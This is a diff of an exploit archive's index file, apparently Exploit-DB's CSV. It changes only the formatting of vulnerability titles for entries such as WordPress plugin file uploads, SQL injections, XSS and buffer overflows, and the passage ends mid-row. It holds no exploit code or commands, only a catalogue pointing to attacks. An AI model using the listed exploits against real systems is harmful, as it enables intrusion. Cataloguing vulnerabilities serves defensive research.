23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 Controls Format String Vulnerability",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 -23540,platforms/freebsd/dos/23540.c,"KAME Racoon ""Initial Contact"" SA Deletion Vulnerability",2004-01-14,"Thomas Walpuski",freebsd,dos,0 +23540,platforms/freebsd/dos/23540.c,"KAME Racoon _Initial Contact_ SA Deletion Vulnerability",2004-01-14,"Thomas Walpuski",freebsd,dos,0 23541,platforms/multiple/remote/23541.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23542,platforms/multiple/remote/23542.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 Host Argument Denial of Service Vulnerability",2004-01-15,"Peter Winter-Smith",multiple,dos,0 @@ -20867,8 +20867,8 @@ id,file,description,date,author,platform,type,port 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service Vulnerability",2004-02-04,"Peter Winter-Smith",windows,dos,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server Database Link Crawling Command Execution",2012-12-25,metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler Command Injection",2012-12-25,metasploit,windows,remote,0 -23651,platforms/php/remote/23651.rb,"WordPress WP-Property PHP File Upload Vulnerability",2012-12-25,metasploit,php,remote,0 -23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager PHP File Upload Vulnerability",2012-12-25,metasploit,php,remote,0 +23651,platforms/php/remote/23651.rb,"WordPress WP-Property - PHP File Upload Vulnerability",2012-12-25,metasploit,php,remote,0 +23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager - PHP File Upload Vulnerability",2012-12-25,metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting Vulnerability",2004-02-05,"Cheng Peng Su",php,webapps,0 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x Long Directory Request Remote Denial of Service Vulnerability",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel SHMAT System Call Privilege Escalation Vulnerability",2004-02-05,"Joost Pol",bsd,local,0 @@ -21052,7 +21052,7 @@ id,file,description,date,author,platform,type,port 23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 error.php language Variable Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 error.php Multiple Variables XSS",2004-03-18,"Janek Vind",php,webapps,0 23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 SYMNDIS.SYS Driver Remote Denial of Service Vulnerability",2004-03-18,"eEye Digital Security Team",windows,dos,0 -23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ Parsing Buffer Overflow Vulnerability",2004-03-26,Sam,windows,remote,0 +23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow Vulnerability",2004-03-26,Sam,windows,remote,0 23848,platforms/linux/remote/23848.txt,"SquidGuard 1.x NULL URL Character Unauthorized Access Vulnerability",2004-03-19,"Petko Popadiyski",linux,remote,0 23849,platforms/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 fvwm_make_browse_menu.sh Scripts Command Execution Vulnerability",2004-03-19,"Dominik Vogt",linux,local,0 23850,platforms/windows/dos/23850.txt,"Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability",2004-03-19,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21061,7 +21061,7 @@ id,file,description,date,author,platform,type,port 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 error.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 register.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 -23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields Remote File Inclusion",2013-01-03,metasploit,php,remote,0 +23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,metasploit,php,remote,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 comment_add.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 category_news_headline.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -21170,7 +21170,7 @@ id,file,description,date,author,platform,type,port 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0 -23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0 +23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21210,11 +21210,11 @@ id,file,description,date,author,platform,type,port 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service Vulnerability",2004-04-15,anonymous,windows,dos,0 24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 Malformed STUN Packet Denial of Service Vulnerability",2004-04-08,storm,multiple,dos,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 Long URI Handling Memory Corruption Vulnerability",2004-04-16,"Luca Ercoli",windows,remote,0 -24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 Oversized Error Message Denial of Service Vulnerability",2004-04-17,"K. K. Mookhey",multiple,dos,0 +24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service Vulnerability",2004-04-17,"K. K. Mookhey",multiple,dos,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x Mille Local Save Game File Name Buffer Overrun Vulnerability",2004-04-17,N4rK07IX,bsd,local,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x Phorum_URIAuth SQL Injection Vulnerability",2004-04-19,"Janek Vind",php,webapps,0 -24017,platforms/windows/remote/24017.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037)",2013-01-10,sickness,windows,remote,0 +24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037)",2013-01-10,sickness,windows,remote,0 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload Vulnerability",2013-01-10,metasploit,php,remote,0 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,metasploit,multiple,remote,0 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,metasploit,windows,remote,0 @@ -21308,7 +21308,7 @@ id,file,description,date,author,platform,type,port 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability",2004-05-11,"Stefan Esser",bsd,local,0 24114,platforms/windows/remote/24114.html,"Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness",2004-05-11,http-equiv,windows,remote,0 24115,platforms/hardware/remote/24115.c,"Multiple Linksys Devices DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote,0 -24116,platforms/windows/remote/24116.txt,"Internet Explorer 5_Firefox 0.8_OmniWeb 4.x URI Protocol Handler Arbitrary File Creation/Modification Vulnerability",2004-05-13,"Karol Wiesek",windows,remote,0 +24116,platforms/windows/remote/24116.txt,"Microsoft Internet Explorer 5_ Firefox 0.8_ OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification Vulnerability",2004-05-13,"Karol Wiesek",windows,remote,0 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability",2004-05-14,"Mike Mauler",windows,dos,0 @@ -21345,11 +21345,11 @@ id,file,description,date,author,platform,type,port 24151,platforms/php/webapps/24151.txt,"JPortal 2.2.1 Print.php SQL Injection Vulnerability",2004-05-28,"Maciek Wierciski",php,webapps,0 24152,platforms/php/webapps/24152.txt,"Land Down Under BBCode HTML Injection Vulnerability",2004-05-29,"Tim De Gier",php,webapps,0 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 usersettings.php avmsg Parameter XSS",2004-05-29,"Janek Vind",php,webapps,0 -24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - ""email article to a friend"" Feature XSS",2004-05-29,"Janek Vind",php,webapps,0 +24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - _email article to a friend_ Feature XSS",2004-05-29,"Janek Vind",php,webapps,0 24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 SSI.PHP SQL Injection Vulnerability",2004-06-11,JvdR,php,webapps,0 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness",2003-08-23,Jelmer,windows,remote,0 24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 Dropbox File Download Vulnerability",2004-06-10,"Maarten Verbeek",cgi,webapps,0 -24189,platforms/multiple/remote/24189.html,"Internet Explorer 5.0.1_Opera 7.51 URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 +24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1_ Opera 7.51 - URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager CSRF Vulnerability",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework Diagnostic Mode Bypass Vulnerability",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 24159,platforms/linux/remote/24159.rb,"Nagios3 history.cgi Host Command Execution",2013-01-16,metasploit,linux,remote,0 @@ -21419,7 +21419,7 @@ id,file,description,date,author,platform,type,port 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+_ DI-624_ DI-704 DHCP Log HTML Injection Vulnerability",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection Vulnerability",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component Arbitrary File Upload Vulnerability",2013-01-19,"Red Dragon_al",php,webapps,0 -24229,platforms/php/webapps/24229.txt,"Wordpress plugin Ripe HD FLV Player SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 +24229,platforms/php/webapps/24229.txt,"Wordpress plugin Ripe HD FLV Player - SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service Vulnerability",2004-06-23,"Marceta Milos",freebsd,dos,0 @@ -21483,12 +21483,12 @@ id,file,description,date,author,platform,type,port 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection Vulnerability",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection Vulnerability",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 -24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter CSRF Vulnerability",2013-01-22,"Junaid Hussain",php,webapps,0 +24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter - CSRF Vulnerability",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script Password Disclosure Vulnerability",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.PHP Remote File Include Vulnerability",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass Vulnerability",2004-07-21,"Noam Rathaus",windows,remote,0 -24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 Cookie Object SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 +24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass Vulnerability",2004-07-21,"Jordi Corrales",php,webapps,0 @@ -21583,7 +21583,7 @@ id,file,description,date,author,platform,type,port 24392,platforms/php/webapps/24392.php,"Mantis 0.x New Account Signup Mass Emailing Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability",2004-08-21,sourvivor,multiple,dos,0 -24395,platforms/windows/dos/24395.txt,"Internet Explorer 6.0_Firefox 0.8/0.9.x JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 +24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0_ Firefox 0.8/0.9.x - JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure Vulnerability",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 @@ -21615,7 +21615,7 @@ id,file,description,date,author,platform,type,port 24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x Request Log HTML Injection Vulnerability",2004-09-01,"Dominick Baier",php,webapps,0 24425,platforms/php/webapps/24425.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Comment Module CM_pid XSS",2004-09-01,"GulfTech Security",php,webapps,0 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service Vulnerability",2004-09-01,Stevo,windows,dos,0 -24432,platforms/windows/webapps/24432.txt,"Internet Explorer 8 & Internet Explorer 9 - Steal any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 +24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8 / 9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 @@ -21756,10 +21756,10 @@ id,file,description,date,author,platform,type,port 24590,platforms/linux/dos/24590.txt,"Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable Server-Side Script Execution Vulnerability",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 Handset Remote Denial of Service Vulnerability",2004-09-13,@stake,multiple,dos,0 -24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24594,platforms/unix/dos/24594.txt,"QNX Photon phlocale -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24595,platforms/unix/dos/24595.txt,"QNX Photon input-cfg -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24594,platforms/unix/dos/24594.txt,"QNX Photon phlocale - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24595,platforms/unix/dos/24595.txt,"QNX Photon input-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x Non-ASCII Hostname Heap Overflow Vulnerability",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24598,platforms/multiple/remote/24598.txt,"SnipSnap 0.5.2 HTTP Response Splitting Vulnerability",2004-09-14,"Maestro De-Seguridad",multiple,remote,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 @@ -21799,12 +21799,12 @@ id,file,description,date,author,platform,type,port 24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include Vulnerability",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 -24641,platforms/php/webapps/24641.txt,"WordPress 1.2 wp-login.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24642,platforms/php/webapps/24642.txt,"WordPress 1.2 admin-header.php redirect_url Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24643,platforms/php/webapps/24643.txt,"WordPress 1.2 bookmarklet.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24644,platforms/php/webapps/24644.txt,"WordPress 1.2 categories.php cat_ID Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24645,platforms/php/webapps/24645.txt,"WordPress 1.2 edit.php s Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24646,platforms/php/webapps/24646.txt,"WordPress 1.2 edit-comments.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - wp-login.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - admin-header.php redirect_url Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - bookmarklet.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - categories.php cat_ID Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - edit.php s Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 +24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - edit-comments.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal Vulnerability",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 a forgot_password.php userid Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 @@ -21812,7 +21812,7 @@ id,file,description,date,author,platform,type,port 24651,platforms/php/webapps/24651.txt,"W-Agora 4.1.6 a subscribe_thread.php HTTP Response Splitting",2004-09-30,"Alexander Antipov",php,webapps,0 24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 a login.php loginuser Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 24653,platforms/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow Vulnerability",2004-10-01,"Luigi Auriemma",windows,remote,0 -24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 Template Handling Privilege Escalation Vulnerability",2004-10-04,"Eric Lackey",multiple,remote,0 +24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation Vulnerability",2004-10-04,"Eric Lackey",multiple,remote,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 PHP_Variables Remote Memory Disclosure Vulnerability",2004-09-15,"Stefano Di Paola",php,remote,0 24657,platforms/php/webapps/24657.txt,"BlackBoard Internet Newsboard System 1.5.1 - Remote File Include Vulnerability",2004-10-06,"Lin Xiaofeng",php,webapps,0 @@ -21825,7 +21825,7 @@ id,file,description,date,author,platform,type,port 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability",2004-10-06,anonymous,asp,webapps,0 -24667,platforms/php/webapps/24667.txt,"Wordpress 1.2 Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0 +24667,platforms/php/webapps/24667.txt,"Wordpress 1.2 - Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0 24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service Vulnerability",2004-10-07,"Luigi Auriemma",multiple,dos,0 24669,platforms/linux/remote/24669.txt,"MySQL 3.x/4.x ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",linux,remote,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 @@ -21847,7 +21847,7 @@ id,file,description,date,author,platform,type,port 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 24688,platforms/windows/remote/24688.pl,"best software saleslogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 -24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 +24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting and HTML Injection Vulnerabilities",2004-10-18,"Juan C Calderon",unix,webapps,0 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service Vulnerability",2004-10-19,"Luigi Auriemma",multiple,dos,0 24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 HTML Injection Vulnerability",2004-10-19,PuWu,php,webapps,0 @@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port 24725,platforms/multiple/remote/24725.php,"Trend Micro ScanMail for Domino 2.51/2.6 - Remote File Disclosure Vulnerability",2004-11-05,DokFLeed,multiple,remote,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 -24728,platforms/windows/remote/24728.txt,"Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 +24728,platforms/windows/remote/24728.txt,"Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 @@ -22089,7 +22089,7 @@ id,file,description,date,author,platform,type,port 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514 24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 -24942,platforms/php/webapps/24942.txt,"ZAPms 1.41- SQL Injection Vulnerability",2013-04-09,NoGe,php,webapps,0 +24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection Vulnerability",2013-04-09,NoGe,php,webapps,0 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 @@ -22134,12 +22134,12 @@ id,file,description,date,author,platform,type,port 24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte 